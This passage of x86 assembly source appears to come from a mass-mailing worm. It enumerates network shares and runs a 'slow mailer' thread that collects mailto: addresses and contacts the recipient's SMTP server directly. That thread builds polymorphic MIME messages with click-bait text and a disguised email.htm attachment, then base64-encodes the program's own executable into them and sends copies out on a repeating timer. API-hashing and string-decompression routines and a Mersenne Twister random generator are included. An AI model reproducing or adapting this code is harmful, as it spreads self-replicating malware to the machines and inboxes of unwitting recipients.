call find_files
ip_skipnt label near
pop esi
add esi, size share_info_1nt
dec ebx
jne ip_nextnt
ip_freent label near
call dword ptr [esp + 3ch + ipntcrcstk.ipntNetApiBufferFree + 4]
jmp ip_restore
find_ip endp
create_thr3 label near
push esi
push esi
call cCreateThread
;-----------------------------------------------------------------------------
;thread 4: send email to last mailto: address found. slow mailer
;-----------------------------------------------------------------------------
push "23"
push "_2sw"
push esp
call cLoadLibraryA
pop ecx
pop ecx
test eax, eax
jne found_ws2
push "23k"
push "cosw"
push esp
call cLoadLibraryA
pop ecx
pop ecx
found_ws2 label near
call init_findmz
;-----------------------------------------------------------------------------
;API CRC table, null terminated
;-----------------------------------------------------------------------------
ws2crcbegin label near ;place < 80h bytes from call for smaller code
dd (ws2crc_count + 1) dup (0)
ws2crcend label near
dd offset wsock_init - offset ws2crcend + 4
wsock_init label near
mov ebx, esp
enter (size WSADATA + 3) and -4, 0
push esp
push 1
call dword ptr [ebx + ws2crcstk.wWSAStartup]
leave
pop eax
pop dword ptr ds:[offset store_send - offset junkhtml_inf + expsize + 401001h]
push PF_NS
push SOCK_STREAM
push AF_INET
call eax
mov dword ptr ds:[offset store_socket - offset junkhtml_inf + expsize + 401001h], eax
xchg ebp, eax
send_email label near
push 240 * 60 * 1000 ;4 hours
call cSleep
mov ebx, esp
push ebp
push 10000h ;message buffer
push GMEM_FIXED
call cGlobalAlloc
push eax ;GlobalFree
xchg edi, eax
mov esi, offset email_block - offset junkhtml_inf + expsize + 401000h
push ebx
push ebp
call decompmain ;smtp1 ("HELO ")
pop ebp
pop ebx
push esi
mov esi, offset mail_recip - offset junkhtml_inf + expsize + 401000h
find_smtp label near
lods byte ptr [esi]
cmp al, '@'
je store_smtp
or al, 5
cmp al, "'"
jne find_smtp
pop eax
branch_skip label near
jmp skip_send
store_smtp label near
mov ecx, edi
mov eax, "ptms"
stos dword ptr [edi]
mov al, '.'
stos byte ptr [edi]
copy_smtp label near
lods byte ptr [esi]
stos byte ptr [edi]
or al, 5
sub al, "'"
jne copy_smtp
pop esi
dec edi
mov byte ptr [edi], al
push ecx
call dword ptr [ebx - 8 + ws2crcstk.wgethostbyname]
xchg ecx, eax
jecxz branch_skip
;-----------------------------------------------------------------------------
;create and initialise sockaddr_in structure
;-----------------------------------------------------------------------------
push 0
push 0
push dword ptr [ecx + hostent.h_addr_list]
push (1900h shl 10h) + AF_INET
mov eax, esp
push size sockaddr_in
push eax
push ebp
call dword ptr [ebx - 8 + ws2crcstk.wconnect]
add esp, size sockaddr_in
call store_crlf
call senddata
;-----------------------------------------------------------------------------
;SMTP client engine by RT Fishel
;polymorphic headers (random comment insertion)
;-----------------------------------------------------------------------------
call decompmain ;smtp2 ("MAIL FROM:<>")
call senddata
call decompmain ;smtp3 ("RCPT TO:")
push esi
mov esi, offset mail_recip - offset junkhtml_inf + expsize + 401000h
copy_recip label near
lods byte ptr [esi]
stos byte ptr [edi]
or al, 5
cmp al, "'"
jne copy_recip
pop esi
dec edi
call store_crlf
call senddata
call decompmain ;smtp4 ("DATA")
call senddata
call decompmain ;header1 ("From: ")
call randword
call decompmain ;header2 ("Subject: ...")
call decompmime ;header31 ("MIME-Version:")
call decomptype ;part11 ("Content-Type:")
call decompcomcr ;part12 ("multipart/mixed;")
call decompcomnt ;part13 (" boundary=")
push edi
call randword ;boundary
call store_crlf
mov eax, edi
pop ecx
push ecx ;boundary pointer
sub eax, ecx
sub eax, 4
push eax ;boundary length
call randlines
pop eax
pop ecx
push ecx
push eax
call bound_copy ;boundary
dec edi
dec edi
mov eax, (0a0dh shl 10h) + '--'
stos dword ptr [edi] ;end of message ;)
stos word ptr [edi]
pop eax
pop ecx
push ecx
push eax
call bound_copy ;--boundary
call decompmain ;body1 ("Just click...")
mov eax, ('--' shl 10h) + 0a0dh
stos dword ptr [edi]
pop eax
pop ecx
push ecx
push eax
call bound_copy
push esi
call decomptype ;content-type
pop esi
call decompcomcr ;part21 ("text/plain;")
call decompcomnt ;part22 (" name=email.htm")
call decompcmap ;part23 ("Content-Transfer-Encoding:")
call decompcomnt ;part24 ("quoted-printable")
call decompcmap ;part25 ("Content-Disposition:")
push offset part26 - offset part25 - 4
pop ebp
call decompcomcr ;part26 ("attachment")
push edi
push esi
call decompmime ;header31 ("MIME-Version:")
pop esi
call decompcmap ;part27 ("Content-Location:")
push esi
patch_encode label near
mov esi, 'RTF!'
call decompcmap ;content-encoding
pop esi
call decompcomcr ;part28 ("base64")
call store_crlf
push esi
push ebp ;CreateFileA
push ebp ;CreateFileA
push OPEN_EXISTING ;CreateFileA
push ebp ;CreateFileA
push FILE_SHARE_READ ;CreateFileA
push GENERIC_READ ;CreateFileA
push edi ;CreateFileA
push 7fh
push edi
push ebp
push (krncrcstk.kGetModuleFileNameA - krncrcstk.klstrlenW) shr 2
pop eax
call store_krnapi
push (krncrcstk.kCreateFileA - krncrcstk.klstrlenW) shr 2
pop eax
call store_krnapi
push ebp
push eax
xchg ebx, eax
push (krncrcstk.kGetFileSize - krncrcstk.klstrlenW) shr 2
pop eax
call store_krnapi
push eax
xchg ebp, eax
push GMEM_ZEROINIT
call cGlobalAlloc
push eax ;GlobalFree
push ebx ;CloseHandle
push eax
push esp
push ebp
push eax
push ebx
xchg esi, eax
push (krncrcstk.kReadFile - krncrcstk.klstrlenW) shr 2
pop eax
call store_krnapi
call cCloseHandle
call b64encode
call cGlobalFree
pop esi
call decompmain ;part31 ("<script>moveBy...")
pop eax
call decompoct
mov eax, ('--' shl 10h) + 0a0dh
stos dword ptr [edi]
pop eax
pop ecx
call bound_copy
call randlines
call decompmain ;part41
call senddata
call decompmain ;part42
call senddata
skip_send label near
call cGlobalFree
pop ebp
jmp send_email
email_block label near
include email.inc
;-----------------------------------------------------------------------------
;Mersenne Twister RNG MT19937 (c) 1997 Makoto Matsumoto and Takuji Nishimura
;period is ((2^19937)-1) with 623-dimensionally equidistributed sequence
;asm port and size optimise by rgb in 2002
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; randinit: seed the MT19937 state array and reset the generator bookkeeping.
; In:    eax = seed (low bit is forced to 1 below, so an even seed is accepted)
;        ecx = 0 (REQUIRED: only the low 16 bits are written with statelen,
;              so the upper half of ecx must already be zero)
;        edi -> RNG cache (statelen dwords of state storage)
; Out:   randvars[0] = 1 (numbers left), randvars[1] = randvars[2] = cache base
; Clobb: none visible to the caller (all GPRs restored via pushad/popad);
;        flags are not preserved
; Notes: assumes DF is clear so stos advances edi — TODO confirm at call sites.
;        randvars is located PC-relative (call/pop + displacement), so the
;        routine does not depend on its load address.
;-----------------------------------------------------------------------------
randinit proc near ;eax = seed, ecx = 0, edi -> RNG cache
pushad
push edi ;keep cache base; it becomes the next/state pointers below
or eax, 1 ;odd seed, as in the original 1997 sgenrand()
mov cx, statelen ;16-bit write: relies on ecx = 0 on entry for the count
init_loop label near
stos dword ptr [edi] ;state[i] = current value
mov edx, 69069
mul edx ;Knuth: x_new = x_old * 69069 (low 32 bits kept, edx discarded)
loop init_loop
inc ecx ;ecx = 1 after the loop: "numbers left" so the first random() call refills
call initdelta ;push address of initdelta to locate randvars PC-relative
initdelta label near
pop edi
add edi, offset randvars - offset initdelta ;edi -> randvars
xchg ecx, eax ;eax = 1 (ecx now holds the last multiplied value, unused)
stos dword ptr [edi] ;randvars[0]: numbers left = 1
pop eax ;original edi (cache base)
stos dword ptr [edi] ;randvars[1]: next pointer = cache base
stos dword ptr [edi] ;randvars[2]: state pointer = cache base
popad
ret
randinit endp
random proc near
pushad
call randelta
randvars label near
db 'rgb!' ;numbers left
db 'rgb!' ;next pointer
db 'rgb!' ;state pointer
randelta label near
pop esi
push esi
lods dword ptr [esi]
xchg ecx, eax
lods dword ptr [esi]
xchg esi, eax
loop random_ret
mov cx, statelen - period
mov esi, dword ptr [eax]